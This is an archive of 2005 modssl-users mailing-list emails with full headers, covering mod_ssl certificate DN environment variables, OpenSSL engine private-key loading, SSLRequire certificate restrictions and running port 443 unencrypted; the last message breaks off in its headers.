Received: by master.modssl.org (Postfix, from userid 30101)
	id 4553114D870; Tue, 11 Oct 2005 12:39:12 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from natsmtp00.rzone.de (natsmtp00.rzone.de [81.169.145.165])
	by master.modssl.org (Postfix) with ESMTP id F315214D830
	for ; Tue, 11 Oct 2005 12:39:11 +0200 (CEST)
Received: from bitgully.knitter.privat (p54934C84.dip.t-dialin.net [84.147.76.132])
	by post.webmailer.de (8.13.1/8.13.1) with ESMTP id j9BAd7N9018067
	for ; Tue, 11 Oct 2005 12:39:08 +0200 (MEST)
Received: by bitgully.knitter.privat (Postfix, from userid 65534)
	id B8189185DD; Tue, 11 Oct 2005 12:39:08 +0200 (CEST)
Received: from notebook.knitter.privat (notebook.KNITTER.PRIVAT [192.168.0.246])
	by bitgully.knitter.privat (Postfix) with ESMTP id 75A95185DD
	for ; Tue, 11 Oct 2005 12:39:03 +0200 (CEST)
From: "Dr. Harry Knitter" 
To: modssl-users@modssl.org
Subject: Environment variables question
Date: Tue, 11 Oct 2005 12:39:14 +0200
User-Agent: KMail/1.8.2
MIME-Version: 1.0
Content-Type: text/plain;
  charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Message-Id: <200510111239.14957.harry@knitter-edv-beratung.de>
X-Spam-Checker-Version: SpamAssassin 3.0.4 (2005-06-05) on 
	bitgully.knitter.privat
X-Spam-Level: 
X-Spam-Status: No, score=-4.5 required=4.0 tests=ALL_TRUSTED,AWL,BAYES_00 
	autolearn=failed version=3.0.4
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Dr. Harry Knitter" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello,

I have a question about the meaning of some environment variables for mod_ssl.

What do the fields T, I, G, S, and D in subject or issuer DNs mean, 
respectively, to which fields of a certificate do they point?

Thanks

Harry
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Oct 11 13:09:46 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 3955D14D870; Tue, 11 Oct 2005 13:09:46 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from wproxy.gmail.com (wproxy.gmail.com [64.233.184.192])
	by master.modssl.org (Postfix) with ESMTP id B83F714D830
	for ; Tue, 11 Oct 2005 13:09:45 +0200 (CEST)
Received: by wproxy.gmail.com with SMTP id i2so708204wra
        for ; Tue, 11 Oct 2005 04:09:44 -0700 (PDT)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references;
        b=G4UjgI6PQXkB//FtFxXBa9k99MR6DxhDy4ov5N52y4yEYkymq8mKEOGXycuLAJch4Zh1Hc90OoWl2WsAk7NkEd2RfGZBKpKsbzbp2Xcp+u88z/NUmV1P2j7ABo5EV6RU/jaBpYz8kNZL51lsQsNL0NLirMRvnVwMKTrFcZ0kMSw=
Received: by 10.54.129.5 with SMTP id b5mr3523522wrd;
        Tue, 11 Oct 2005 04:09:44 -0700 (PDT)
Received: by 10.54.105.9 with HTTP; Tue, 11 Oct 2005 04:09:44 -0700 (PDT)
Message-ID: 
Date: Tue, 11 Oct 2005 07:09:44 -0400
From: BJ Swope 
To: modssl-users@modssl.org
Subject: Re: Environment variables question
In-Reply-To: <200510111239.14957.harry@knitter-edv-beratung.de>
MIME-Version: 1.0
Content-Type: multipart/alternative; 
	boundary="----=_Part_7704_18662515.1129028984359"
References: <200510111239.14957.harry@knitter-edv-beratung.de>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: BJ Swope 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

------=_Part_7704_18662515.1129028984359
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline

Post your certificate and I'd be glad to take a look.

BJ



On 10/11/05, Dr. Harry Knitter  wrote:
>
> Hello,
>
> I have a question about the meaning of some environment variables for
> mod_ssl.
>
> What do the fields T, I, G, S, and D in subject or issuer DNs mean,
> respectively, to which fields of a certificate do they point?
>
> Thanks
>
> Harry
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl) www.modssl.org
> User Support Mailing List modssl-users@modssl.org
> Automated List Manager majordomo@modssl.org
>

------=_Part_7704_18662515.1129028984359
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline

Post your certificate and I'd be glad to take a look.



BJ





On 10/11/05, Dr. Harry Knitter <harry@knitter-edv-beratung.de> wrote:

Hello,

I have a question about the meaning of some environment varia=
bles for mod_ssl.

What do the fields T, I, G, S, and D in subject or=
 issuer DNs mean,
respectively, to which fields of a certificate do they=
 point?


Thanks

Harry
____________________________________________=
__________________________
Apache
Interface to OpenSSL
(mod_ssl)           =
       
www.modssl.org
User Support Mailin=
g
List            =
;          modssl-users@modssl.org
Automated
List
Manager           &n=
bsp;            =
;    majordomo@=
modssl.org



------=_Part_7704_18662515.1129028984359--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Oct 11 13:26:33 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 8920014D871; Tue, 11 Oct 2005 13:26:33 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from natfrord.rzone.de (natfrord.rzone.de [81.169.145.161])
	by master.modssl.org (Postfix) with ESMTP id 5767314D830
	for ; Tue, 11 Oct 2005 13:26:32 +0200 (CEST)
Received: from bitgully.knitter.privat (p54934C84.dip.t-dialin.net [84.147.76.132])
	by post.webmailer.de (8.13.1/8.13.1) with ESMTP id j9BBQV7m029964
	for ; Tue, 11 Oct 2005 13:26:32 +0200 (MEST)
Received: by bitgully.knitter.privat (Postfix, from userid 65534)
	id 2174845614; Tue, 11 Oct 2005 13:26:33 +0200 (CEST)
Received: from notebook.knitter.privat (notebook.KNITTER.PRIVAT [192.168.0.246])
	by bitgully.knitter.privat (Postfix) with ESMTP id E92B717914
	for ; Tue, 11 Oct 2005 13:26:30 +0200 (CEST)
From: "Dr. Harry Knitter" 
To: modssl-users@modssl.org
Subject: Re: Environment variables question
Date: Tue, 11 Oct 2005 13:26:40 +0200
User-Agent: KMail/1.8.2
References: <200510111239.14957.harry@knitter-edv-beratung.de> 
In-Reply-To: 
MIME-Version: 1.0
Content-Type: text/plain;
  charset="iso-8859-15"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Message-Id: <200510111326.41425.harry@knitter-edv-beratung.de>
X-Spam-Checker-Version: SpamAssassin 3.0.4 (2005-06-05) on 
	bitgully.knitter.privat
X-Spam-Level: 
X-Spam-Status: No, score=-4.5 required=4.0 tests=ALL_TRUSTED,AWL,BAYES_00 
	autolearn=failed version=3.0.4
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Dr. Harry Knitter" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Am Dienstag 11 Oktober 2005 13:09 schrieb BJ Swope:
> Post your certificate and I'd be glad to take a look.
>
> BJ
>


for what do you need my certificate to answer this question?
I simply would like to know what is the meaning of the following variables

Examples:
SSL_CLIENT_S_DN_T
SSL_CLIENT_S_DN_I
SSL_CLIENT_S_DN_G
SSL_CLIENT_S_DN_D


Harry


> On 10/11/05, Dr. Harry Knitter  wrote:
> > Hello,
> >
> > I have a question about the meaning of some environment variables for
> > mod_ssl.
> >
> > What do the fields T, I, G, S, and D in subject or issuer DNs mean,
> > respectively, to which fields of a certificate do they point?
> >
> > Thanks
> >
> > Harry
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)
> > www.modssl.org User Support Mailing List
> > modssl-users@modssl.org
> > Automated List Manager majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Oct 11 13:43:53 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 62E7314D876; Tue, 11 Oct 2005 13:43:53 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from xproxy.gmail.com (xproxy.gmail.com [66.249.82.205])
	by master.modssl.org (Postfix) with ESMTP id E853B14D86D
	for ; Tue, 11 Oct 2005 13:43:52 +0200 (CEST)
Received: by xproxy.gmail.com with SMTP id h31so1070775wxd
        for ; Tue, 11 Oct 2005 04:43:51 -0700 (PDT)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:sender:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references;
        b=NoGzMJx4M7L4M2v6efZjXLIWaYP5/Nz+zSok+sG0aPI2RBSogHlz+8K2pPyyIoEB82fDxtJP0yj9uFiBaZI83P+m2GYSUw1yzLX745os6qMsNeARkRBquIbJEg5uv09Lq2cstyTLwLLeoH0AdL0f7ozI1T41mxagplnsgdFJYP0=
Received: by 10.70.96.8 with SMTP id t8mr3598966wxb;
        Tue, 11 Oct 2005 04:43:51 -0700 (PDT)
Received: by 10.70.73.11 with HTTP; Tue, 11 Oct 2005 04:43:51 -0700 (PDT)
Message-ID: 
Date: Tue, 11 Oct 2005 07:43:51 -0400
From: Cliff Woolley 
To: modssl-users@modssl.org
Subject: Re: Environment variables question
In-Reply-To: <200510111326.41425.harry@knitter-edv-beratung.de>
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
References: <200510111239.14957.harry@knitter-edv-beratung.de>
	 
	 <200510111326.41425.harry@knitter-edv-beratung.de>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

> I simply would like to know what is the meaning of the following variable=
s
>
> Examples:
> SSL_CLIENT_S_DN_T
> SSL_CLIENT_S_DN_I

There's a nice table of these at
http://www.covalent.net/resource/documentation/ers/2.0.0/productguide/html/=
proxymodule.html
.

I had to dig pretty good to find that, though.  I've never seen them before=
.  :)

--Cliff
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Oct 11 13:58:59 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 7914A14D871; Tue, 11 Oct 2005 13:58:59 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from natsmtp00.rzone.de (natsmtp00.rzone.de [81.169.145.165])
	by master.modssl.org (Postfix) with ESMTP id 3936514D830
	for ; Tue, 11 Oct 2005 13:58:58 +0200 (CEST)
Received: from bitgully.knitter.privat (p54934C84.dip.t-dialin.net [84.147.76.132])
	by post.webmailer.de (8.13.1/8.13.1) with ESMTP id j9BBwvZA012398
	for ; Tue, 11 Oct 2005 13:58:58 +0200 (MEST)
Received: by bitgully.knitter.privat (Postfix, from userid 65534)
	id 6DE8D5182A; Tue, 11 Oct 2005 13:58:59 +0200 (CEST)
Received: from notebook.knitter.privat (notebook.KNITTER.PRIVAT [192.168.0.246])
	by bitgully.knitter.privat (Postfix) with ESMTP id 2F34251826
	for ; Tue, 11 Oct 2005 13:58:58 +0200 (CEST)
From: "Dr. Harry Knitter" 
To: modssl-users@modssl.org
Subject: Re: Environment variables question
Date: Tue, 11 Oct 2005 13:59:09 +0200
User-Agent: KMail/1.8.2
References: <200510111239.14957.harry@knitter-edv-beratung.de> <200510111326.41425.harry@knitter-edv-beratung.de> 
In-Reply-To: 
MIME-Version: 1.0
Content-Type: text/plain;
  charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Message-Id: <200510111359.09193.harry@knitter-edv-beratung.de>
X-Spam-Checker-Version: SpamAssassin 3.0.4 (2005-06-05) on 
	bitgully.knitter.privat
X-Spam-Level: 
X-Spam-Status: No, score=-4.5 required=4.0 tests=ALL_TRUSTED,AWL,BAYES_00 
	autolearn=failed version=3.0.4
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Dr. Harry Knitter" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Am Dienstag 11 Oktober 2005 13:43 schrieb Cliff Woolley:
> > I simply would like to know what is the meaning of the following
> > variables
> >
> > Examples:
> > SSL_CLIENT_S_DN_T
> > SSL_CLIENT_S_DN_I
>
> There's a nice table of these at
> http://www.covalent.net/resource/documentation/ers/2.0.0/productguide/html/
>proxymodule.html .
>
> I had to dig pretty good to find that, though.  I've never seen them
> before.  :)
>
> --Cliff

Thank you very much, this was what I was searching for.

Greetings

Harry
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Oct 11 16:16:28 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 4333614D871; Tue, 11 Oct 2005 16:16:28 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from wproxy.gmail.com (wproxy.gmail.com [64.233.184.205])
	by master.modssl.org (Postfix) with ESMTP id ACC0314D830
	for ; Tue, 11 Oct 2005 16:16:23 +0200 (CEST)
Received: by wproxy.gmail.com with SMTP id i2so726103wra
        for ; Tue, 11 Oct 2005 07:16:22 -0700 (PDT)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references;
        b=ruTql5/CwTaIsgaUJCBW5ugiKwkfEaA24o/5AnmnAoelAoghnlyRdZiR38m3aAy7dM8r2mRyE73zGtZrvMZsMI3yZRLl1beQQQwiBhLFfZfn2/oZYo1Dan549lgPA7m5fTn552IYVgqnq4Wsb1ABkN72Me/IzpSjZkwS01pP9Q8=
Received: by 10.54.94.16 with SMTP id r16mr3556545wrb;
        Tue, 11 Oct 2005 07:16:22 -0700 (PDT)
Received: by 10.54.105.9 with HTTP; Tue, 11 Oct 2005 07:16:22 -0700 (PDT)
Message-ID: 
Date: Tue, 11 Oct 2005 10:16:22 -0400
From: BJ Swope 
To: modssl-users@modssl.org
Subject: Re: Environment variables question
In-Reply-To: <200510111359.09193.harry@knitter-edv-beratung.de>
MIME-Version: 1.0
Content-Type: multipart/alternative; 
	boundary="----=_Part_11061_16202220.1129040182302"
References: <200510111239.14957.harry@knitter-edv-beratung.de>
	 <200510111326.41425.harry@knitter-edv-beratung.de>
	 
	 <200510111359.09193.harry@knitter-edv-beratung.de>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: BJ Swope 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

------=_Part_11061_16202220.1129040182302
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline

I was wanting a context for the information. Oftentimes context will provid=
e
indicators of purpose.

------=_Part_11061_16202220.1129040182302
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline

I was wanting a context for the information.  Oftentimes context will =
provide indicators of purpose.


------=_Part_11061_16202220.1129040182302--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct 12 06:31:19 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 0404D14D876; Wed, 12 Oct 2005 06:31:19 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from geiger.vandervecken.com (geiger.vandervecken.com [203.97.150.130])
	by master.modssl.org (Postfix) with ESMTP id 705A214D82C
	for ; Wed, 12 Oct 2005 06:31:16 +0200 (CEST)
Received: from geoff by geiger.vandervecken.com with local (Exim 4.50)
	id 1EPYGl-0008A4-Vt; Wed, 12 Oct 2005 17:31:12 +1300
From: Geoff Thorpe 
To: modssl-users@modssl.org
Subject: Re: engine format keys
Date: Wed, 12 Oct 2005 00:31:00 -0400
User-Agent: KMail/1.8.1
References: <499d6ed30509290928x1d2cc3e9h31a8a4524fae6a42@mail.gmail.com> <499d6ed30510041122w73a9ee15r86c5131a4851fa8@mail.gmail.com> <499d6ed30510061401n72381dbcn2ae204e4c1372024@mail.gmail.com>
In-Reply-To: <499d6ed30510061401n72381dbcn2ae204e4c1372024@mail.gmail.com>
Cc: Richard Levitte 
MIME-Version: 1.0
Content-Type: text/plain;
  charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
Message-Id: <200510120031.01248.geoff@geoffthorpe.net>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Geoff Thorpe 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi Kent,

On October 6, 2005 05:01 pm, Kent Yoder wrote:
>   Yep, passphrase entry is at least part of the problem with calling
> ENGINE_load_private_key.   After a few different attempts, I'm a bit
> stumped.  The load key call wants a UI* passed to it, which eventually
> has UI_process() called on it by the engine.  I've tried various ways
> of stuffing the modssl_read_bio_cb_fn pointer and the server rec into
> this structure, with a custom flush function which'd get called by
> UI_process.  I haven't been able to test this approach yet, since it
> appears that openssl's UI_STRING and UI_METHOD structs aren't declared
> in a way that works in ui.h. For instance, any mention of
> sizeof(UI_STRING) brings an incomplete type error.  Any help would be
> appreciated, I may not be using the ui interface correctly.

Alas I can't give you any off-the-top hints about UI_METHOD because I=20
haven't used it myself, so I've CC'd Richard who is the guy who did=20
UI_METHOD. Richard, if there's anything obvious in the above snippet=20
please feel free to comment. However I'd suggest taking this over to the=20
openssl-dev mail list Kent - then Richard and/or others can follow up=20
more meaningfully (and the subsequent discussion might be useful for=20
ongoing development).

Cheers,
Geoff

=2D-=20
Geoff Thorpe
geoff@geoffthorpe.net
http://www.geoffthorpe.net/

M=EAme ceux qui se sentent pas des n=F4tres, ne nous voyant plus =E0 genoux,
seront, plus que jamais, chez eux chez nous.
  -- Loco Locass
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct 12 08:39:07 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 54E9714D86E; Wed, 12 Oct 2005 08:39:07 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from natfrord.rzone.de (natfrord.rzone.de [81.169.145.161])
	by master.modssl.org (Postfix) with ESMTP id 28F7214D82C
	for ; Wed, 12 Oct 2005 08:39:06 +0200 (CEST)
Received: from bitgully.knitter.privat (p549364ED.dip.t-dialin.net [84.147.100.237])
	by post.webmailer.de (8.13.1/8.13.1) with ESMTP id j9C6d5PL015117
	for ; Wed, 12 Oct 2005 08:39:06 +0200 (MEST)
Received: by bitgully.knitter.privat (Postfix, from userid 65534)
	id 1214E44ABE; Wed, 12 Oct 2005 08:39:15 +0200 (CEST)
Received: from [192.168.0.253] (unknown [192.168.0.253])
	by bitgully.knitter.privat (Postfix) with ESMTP id B462219FFE
	for ; Wed, 12 Oct 2005 08:39:08 +0200 (CEST)
From: "Dr. Harry Knitter" 
To: modssl-users@modssl.org
Subject: How to allow only certain Certificates
Date: Wed, 12 Oct 2005 08:39:05 +0200
User-Agent: KMail/1.7.1
MIME-Version: 1.0
Content-Type: text/plain;
  charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
Message-Id: <200510120839.05409.harry@knitter-edv-beratung.de>
X-Spam-Checker-Version: SpamAssassin 3.0.4 (2005-06-05) on 
	bitgully.knitter.privat
X-Spam-Level: 
X-Spam-Status: No, score=-4.5 required=4.0 tests=ALL_TRUSTED,AWL,BAYES_00 
	autolearn=failed version=3.0.4
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Dr. Harry Knitter" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello,

how can I restrict access to my Apache to owners of certain individual=20
certificates?

I have tried the following (it doesn=B4t work, however):

SSLREQUIRE %{SSL_CLIENT_S_DN_UID} in {"","",...}

where  is the X509 extension Subject Key Identifyer=
 of=20
the client=B4s certificate.
I tried it with colons and without.
The expression always results in false.

What is the corresponding value for SSL_CLIENT_S_DN_UID in a certificate?

Thanks

Harry
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct 12 17:03:12 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id D768614D86E; Wed, 12 Oct 2005 17:03:11 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from xproxy.gmail.com (xproxy.gmail.com [66.249.82.196])
	by master.modssl.org (Postfix) with ESMTP id DE92014D82C
	for ; Wed, 12 Oct 2005 17:03:10 +0200 (CEST)
Received: by xproxy.gmail.com with SMTP id h32so25137wxd
        for ; Wed, 12 Oct 2005 08:03:09 -0700 (PDT)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:to:subject:cc:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references;
        b=mQcCeU2CjLOrilkcuMg2tbhRrNHGfNXO/5bpRXU/ObhGLacWrS+dugGDJNlHWzn6tTBJWpdytE2AKXyjetJsw8Ttrb7cc0ntUmkcOf3VBy1m2X8+2DKQ/ovmsgN5zTgfAshSzIxZd0XyM5HC0DeYBY4HsXTnMY+FsefhIZpzYgU=
Received: by 10.70.58.7 with SMTP id g7mr10141wxa;
        Wed, 12 Oct 2005 08:03:09 -0700 (PDT)
Received: by 10.70.57.7 with HTTP; Wed, 12 Oct 2005 08:03:09 -0700 (PDT)
Message-ID: <499d6ed30510120803t4289904bo75e1bedd52298c6d@mail.gmail.com>
Date: Wed, 12 Oct 2005 10:03:09 -0500
From: Kent Yoder 
To: modssl-users@modssl.org
Subject: Re: engine format keys
Cc: Richard Levitte 
In-Reply-To: <200510120031.01248.geoff@geoffthorpe.net>
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
References: <499d6ed30509290928x1d2cc3e9h31a8a4524fae6a42@mail.gmail.com>
	 <499d6ed30510041122w73a9ee15r86c5131a4851fa8@mail.gmail.com>
	 <499d6ed30510061401n72381dbcn2ae204e4c1372024@mail.gmail.com>
	 <200510120031.01248.geoff@geoffthorpe.net>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Kent Yoder 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi Geoff,

> Alas I can't give you any off-the-top hints about UI_METHOD because I
> haven't used it myself, so I've CC'd Richard who is the guy who did
> UI_METHOD. Richard, if there's anything obvious in the above snippet
> please feel free to comment. However I'd suggest taking this over to the
> openssl-dev mail list Kent - then Richard and/or others can follow up
> more meaningfully (and the subsequent discussion might be useful for
> ongoing development).

  I haven't had time to go back and play with it much, but last time I
tried, this
program didn't compile:

#include 
int main(void)
{
        UI_STRING *ui =3D malloc(sizeof(UI_STRING));
        return 0;
}

  I was going on the assumption that I'd need to stuff the secret
pulled in from the modssl callback into a UI_STRING object though,
perhaps this is wrong...  Downloading 0.9.8a now...

Kent

--
Kent Yoder
IBM LTC Security Dev.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Oct 14 10:29:31 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 5962814D867; Fri, 14 Oct 2005 10:29:31 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mxsf35.cluster1.charter.net (mxsf35.cluster1.charter.net [209.225.28.160])
	by master.modssl.org (Postfix) with ESMTP id F3C2314D82B
	for ; Fri, 14 Oct 2005 10:29:30 +0200 (CEST)
Received: from mxip03a.cluster1.charter.net (mxip03a.cluster1.charter.net [209.225.28.133])
	by mxsf35.cluster1.charter.net (8.12.11/8.12.11) with ESMTP id j9E8TRwZ011912
	for ; Fri, 14 Oct 2005 04:29:28 -0400
Received: from 68-117-211-186.dhcp.athn.ga.charter.com (HELO desktop) ([68.117.211.186])
  by mxip03a.cluster1.charter.net with SMTP; 14 Oct 2005 04:29:28 -0400
X-IronPort-AV: i="3.97,213,1125892800"; 
   d="scan'208"; a="1530559598:sNHT18306680"
Message-ID: <03db01c5d099$655a2f30$02fea8c0@desktop>
From: "Pigeon" 
To: 
References: <66FF0611-7BF2-4FC0-A064-6104EAE3A2E2@cse.snu.ac.kr>  <06e501c5c296$b8334d60$02fea8c0@desktop>  <002201c5c2ae$e8120400$02fea8c0@desktop> <4338194E.7070306@w3works.com> 
Subject: Is it possible to not force SSL on port:443?
Date: Fri, 14 Oct 2005 04:29:29 -0400
MIME-Version: 1.0
Content-Type: text/plain;
	format=flowed;
	charset="iso-8859-1";
	reply-type=response
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2900.2670
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2670
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Pigeon" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I am helping someone develop a product, and for the next little bit he will 
need to access port 443 with out the communication being encrypted (aka he 
could telnet to it if he wanted).

But in the very near future, he will want to make 443 encrypted..

Is it possible to not force encryption on port443?


thanks! 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Oct 14 13:36:21 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 732DB14D86E; Fri, 14 Oct 2005 13:36:21 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from xproxy.gmail.com (xproxy.gmail.com [66.249.82.201])
	by master.modssl.org (Postfix) with ESMTP id 1781914D82B
	for ; Fri, 14 Oct 2005 13:36:20 +0200 (CEST)
Received: by xproxy.gmail.com with SMTP id h31so448921wxd
        for ; Fri, 14 Oct 2005 04:36:19 -0700 (PDT)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:sender:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references;
        b=MrqPazTTS/Rj1qTYdMsDTY9DaSONcyPfvC/YBY5bKgjDZiG8YxernUmZ38/MjYRvPIfjk0ytAzCbjAf5/YtJzKZ1gAjiJygRKmIVxOAhhS5Q8da32A5g2FZyJxdJrhpQM8KDt1oLojvFNcXev49sCVY7cSQBfKvZX4BYc0RlyNg=
Received: by 10.70.69.20 with SMTP id r20mr1150842wxa;
        Fri, 14 Oct 2005 04:36:19 -0700 (PDT)
Received: by 10.70.73.11 with HTTP; Fri, 14 Oct 2005 04:36:19 -0700 (PDT)
Message-ID: 
Date: Fri, 14 Oct 2005 07:36:19 -0400
From: Cliff Woolley 
To: modssl-users@modssl.org
Subject: Re: Is it possible to not force SSL on port:443?
In-Reply-To: <03db01c5d099$655a2f30$02fea8c0@desktop>
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
References: <66FF0611-7BF2-4FC0-A064-6104EAE3A2E2@cse.snu.ac.kr>
	 
	 <06e501c5c296$b8334d60$02fea8c0@desktop>
	 
